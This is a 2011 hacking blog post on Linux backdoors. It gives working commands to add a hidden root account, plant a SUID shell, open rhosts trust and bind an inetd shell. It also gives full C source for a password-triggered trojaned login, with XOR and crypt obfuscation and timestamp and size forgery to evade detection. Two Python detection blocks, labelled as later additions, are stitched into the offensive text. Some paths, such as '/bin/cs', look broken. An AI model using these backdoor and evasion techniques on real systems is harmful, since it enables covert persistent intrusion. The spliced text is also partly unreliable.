Friday, April 8, 2011

Advanced hacker techniques and practice: Linux backdoors

Introduction: a back door is a technique by which an intruder who has gained full control of a system makes it convenient to get back in and use it again next time.

The back door is generally implemented by modifying system configuration files and installing third-party tools. It is hidden, can bypass the system logs, and is not easily found by the system administrator.

Common backdoor techniques

1. Adding a root account:

    # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
    # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

If the system does not allow uid 0 users to log in remotely, an ordinary user account must be added as well.

2. Cracking or sniffing user passwords: crack weak user passwords from the shadow file with a tool such as John the Ripper, or install a sniffer such as sniffit to listen on the telnet and FTP ports and collect user passwords.

3. Placing a SUID shell:

    # cp /bin/bash /dev/.rootshell
    # chmod u+s /dev/.rootshell

An ordinary user who runs /dev/.rootshell locally obtains a shell with root permissions.

4. Rhosts ++:

    # echo "+ +" > /.rhosts
    # rsh -l root victim.com csh -i

gives a root shell remotely.

5. Using system service programs: modify /etc/inetd.conf, for example daytime stream tcp nowait root /bin/sh sh -i; replace an inetd service program such as in.telnetd or in.rexecd with a trojaned version; redirect the login program.

6. TCP/UDP/ICMP shells: bind shells are mostly network service programs based on the TCP/UDP protocols that listen on a high port, and they are easily found. A ping backdoor activates a shell with an ICMP packet. A TCP ACK-packet backdoor is able to travel across a firewall.

7. Crontab: a backdoor installed through the crontab scheduler runs at a scheduled time, usually late at night when the system administrator is not online.

8. Shared library: a backdoor function embedded in a shared library, activated by the backdoor password, gives a shell and escapes the system administrator's checksum of the binary file itself.
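Each of the account, rhosts, inetd and SUID-shell techniques above leaves a trace in a plain-text configuration file or in a file mode that a defender can audit. The Python below is an added example (not code from the original post) that checks constructed samples of /etc/passwd, .rhosts, inetd.conf and a setuid file list for exactly those traces; the sample contents and the directory list used by suspicious_suid are my assumptions for illustration.

```python
import stat

# Constructed samples of the artifacts the techniques above leave behind.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
e4gle:x:0:0::/:/bin/sh
"""
RHOSTS_SAMPLE = "+ +\n"
INETD_SAMPLE = """ftp     stream tcp nowait root /usr/sbin/tcpd in.ftpd
daytime stream tcp nowait root /bin/sh sh -i
"""
# (path, st_mode) pairs, as "find / -perm -4000" plus stat would report them.
SUID_SAMPLE = [("/usr/bin/passwd", 0o104755), ("/dev/.rootshell", 0o104755),
               ("/bin/su", 0o104755), ("/dev/null", 0o20666)]
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh", "sh", "bash", "csh"}

def extra_root_accounts(passwd_text):
    """Usernames with uid 0 other than root (the added 'e4gle' account)."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits

def trusting_rhosts(rhosts_text):
    """rhosts entries whose host field is '+' (trust any host; '+ +' also trusts any user)."""
    return [l.strip() for l in rhosts_text.splitlines() if l.split()[:1] == ["+"]]

def shell_inetd_services(inetd_text):
    """inetd services whose server program or arguments are a shell (fields 6 onward)."""
    hits = []
    for line in inetd_text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0].startswith("#"):
            continue
        if any(x in SHELLS for x in f[5:]):
            hits.append(f[0])
    return hits

def suspicious_suid(entries):
    """setuid files in volatile directories or with dotfile names, e.g. /dev/.rootshell."""
    out = []
    for path, mode in entries:
        name = path.rsplit("/", 1)[-1]
        if mode & stat.S_ISUID and (path.startswith(("/dev/", "/tmp/")) or name.startswith(".")):
            out.append(path)
    return out
```

On a real host the same functions take the contents of /etc/passwd, ~/.rhosts and /etc/inetd.conf, and the output of a setuid file search, in place of the samples.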
Rootkits

A rootkit contains a series of system and backdoor tools: clearing the login logs, disguising checksums, replacing netstat, ps and other network tools, and a backdoor login program. It is easy to install and use.

Loadable kernel modules (LKM)

LKM, dynamically loaded loadable kernel modules, do not require recompiling the kernel. They intercept system calls and can hide directories, files, processes, network connections and more. They are stealthy and hard to find. The well-known ones are the adore and knark LKM packages.

Backdoor detection

In my own experience, combine specific tools with some manual checking. Use md5 checksums or Tripwire to check the system. With an IDS, watch the target machine for suspicious network connections.

Example: login backdoor

The intruder backs up the original /bin/login and then replaces /bin/login with a modified one. When the intruder telnets in and passes the correct backdoor password through an environment variable or the terminal type, a shell is received directly; a normal user logging in is redirected to the original login file, which handles the normal login.

The simplest login backdoor, ulogin.c source:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define PASSWORD "passWORD"
    #define _PATH_LOGIN "/sbin/logins"   /* the backed-up original login */

    int main(int argc, char **argv, char **envp)
    {
        char *display = getenv("DISPLAY");

        if (display == NULL) {
            /* no DISPLAY set: hand over to the real login */
            execve(_PATH_LOGIN, argv, envp);
            perror(_PATH_LOGIN);
            exit(1);
        }
        if (!strcmp(display, PASSWORD)) {
            /* backdoor password matched: start the shell directly */
            system("/bin/cs");
            exit(1);
        }
        execve(_PATH_LOGIN, argv, envp);
        exit(1);
    }

To use the backdoor login, the telnet service must be enabled first; then, on your own machine:

    bash$ export DISPLAY=passWORD
    bash$ telnet victim.com
    Trying xxx.xxx.xxx.xxx...
    Connected to victim.com (xxx.xxx.xxx.xxx).
    Escape character is '^]'.
    %

The strings command

The strings command prints the printable strings contained in a binary file. Used on the ulogin program above:

    bash$ strings ulogin
    /lib/ld-linux.so.2
    ......
    DISPLAY
    /sbin/logins
    passWORD
    /bin/cs

Encrypting the backdoor password with the DES-based crypt() function:

1. Write the program gen.c:

    #define _XOPEN_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>   /* crypt() */

    int main(int argc, char *argv[])
    {
        if (argc != 3) {
            printf("usage: %s password salt\n", argv[0]);
            exit(1);
        }
        printf("%s\n", crypt(argv[1], argv[2]));
        return 0;
    }

2. Compile gen (link with -lcrypt on Linux) and run it: ./gen hack Ui gives UiVqMWvDrIQjA.

3. Modify the backdoor program ulogin.c: replace the value of the PASSWORD macro in ulogin.c with the ciphertext form of the password, and if the backdoor password is correct, go directly to a shell:

    if (!strcmp(PASSWORD, crypt(display, PASSWORD))) {
        system(SHELL);
        exit(1);
    }

With the strings command only the encrypted password can now be seen.

Hiding strings with XOR

Use an exclusive-or (XOR) algorithm and represent the strings in hexadecimal, so that they are no longer printable.

1. The encoding program encode.c:

    #include <stdio.h>
    #include <string.h>

    char magic[] = "\x71\x67\x6d\x7a\x65\x61\x7a";

    /* XOR str in place with the repeating key; the same call decodes it again */
    char *de(char *str, char *key)
    {
        int i = 0, j = 0, len;

        len = strlen(key);
        while (str[i] != '\0') {
            str[i] ^= key[j];
            j++;
            if (j == len)
                j = 0;
            i++;
        }
        return str;
    }

    /* print each byte as a \x hex escape, in the form shown below */
    void display(char *str)
    {
        int i;

        for (i = 0; i < strlen(str); i++)
            printf("\\x%x", (unsigned char)str[i]);
        printf("\n");
    }

    int main(void)
    {
        char buf[100], *ptr;

        ptr = buf;
        scanf("%99s", ptr);
        de(ptr, magic);
        display(ptr);
        return 0;
    }

2. Compile encode and run it; the output is the input string XORed byte by byte with the cycling magic string. For example, the filename of the original login, /sbin/xlogin, becomes after the XOR:

    \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb

3. Define it this way in the backdoor's source code:

    char login[] = "\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";

then insert the XOR function de() with the same magic string, and the correct backdoor password and paths are recovered at run time. With the strings command neither the password nor the path strings can be seen.
Finally, modify the backdoor ulogin so that its strings output resembles the strings output of the normal login. The practice: add a string array to the code in ulogin.c, char strings[] = "";, and fill in between the quotation marks the strings output of the normal login program. It then passes as the real one, which adds to the deception.

Adjust the backdoor's file date, size and other properties:

1. Date:

    # ls -l /sbin/xlogin
    -r-sr-xr-x   root   root   19300 Feb 11  1998 /sbin/xlogin
    # touch -t 199802110000 ulogin

2. Size:

    # ls -l ulogin /sbin/xlogin
    -r-sr-xr-x   root   root    7542 Feb 11  1998 ulogin
    -r-sr-xr-x   root   root   19300 Feb 11  1998 /sbin/xlogin
    # bc
    19300-7542
    11758
    # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
    1+0 records in
    1+0 records out
    11758 bytes transferred in 0.000379 secs (31016746 bytes/sec)
    # cat /tmp/t >> ulogin

Login backdoor detection

Run md5sum on the existing /bin/login file and compare the value with the one recorded previously. On Red Hat Linux, use the RPM checksum:

    # rpm -V util-linux

An intruder who has used the backdoor login will not be visible in who; look at the system process list instead and find login -h xxx.xxx.xxx.xxx.
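The checksum comparison just described is what defeats the date and size tricks above: the padded copy has the original's size and mtime but not its hash. The Python below is an added example (not code from the original post) that records a baseline of size, mtime and hash for a set of files and reports content changes; it uses sha256 rather than the md5sum named in the text, since md5 is no longer collision-resistant, and its demo() rebuilds the padded-file scenario on constructed stand-in files in a temporary directory.

```python
import hashlib
import os
import tempfile

def sha256_file(path):
    """Hash a file in chunks (sha256 instead of md5, which is no longer collision-resistant)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def take_baseline(paths):
    """Record (size, mtime, sha256) per path on a known-good system, like a Tripwire database."""
    return {p: (os.path.getsize(p), int(os.path.getmtime(p)), sha256_file(p)) for p in paths}

def check_against_baseline(baseline):
    """Paths whose content hash differs from the baseline, noting whether size/mtime differ too."""
    findings = {}
    for p, (size, mtime, digest) in baseline.items():
        cur = (os.path.getsize(p), int(os.path.getmtime(p)), sha256_file(p))
        if cur[2] != digest:
            findings[p] = {"size_changed": cur[0] != size, "mtime_changed": cur[1] != mtime}
    return findings

def demo():
    """Constructed scenario in a temp dir: a stand-in 'login' is baselined, then replaced by a
    smaller file padded with bytes from the original and given the original mtime, i.e. the
    ls -l evasion above. Returns the findings: hash mismatch with size and mtime unchanged."""
    d = tempfile.mkdtemp()
    login = os.path.join(d, "login")
    original = b"REAL-LOGIN-PROGRAM-BYTES" * 40       # 960 bytes, stands in for /sbin/login
    with open(login, "wb") as f:
        f.write(original)
    mtime = 887155200                                  # 1998-02-11 00:00 UTC, as touch -t above
    os.utime(login, (mtime, mtime))
    baseline = take_baseline([login])
    trojan = b"TROJANED-LOGIN-WITH-BACKDOOR" * 10      # 280 bytes, smaller than the original
    padded = trojan + original[:len(original) - len(trojan)]
    with open(login, "wb") as f:
        f.write(padded)                                # same size as the original
    os.utime(login, (mtime, mtime))                    # same mtime as the original
    return check_against_baseline(baseline)

if __name__ == "__main__":
    print(demo())
```

Keep the baseline on read-only or off-host storage, since a rootkit that replaces ps and netstat can just as easily rewrite a baseline stored on the same disk.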
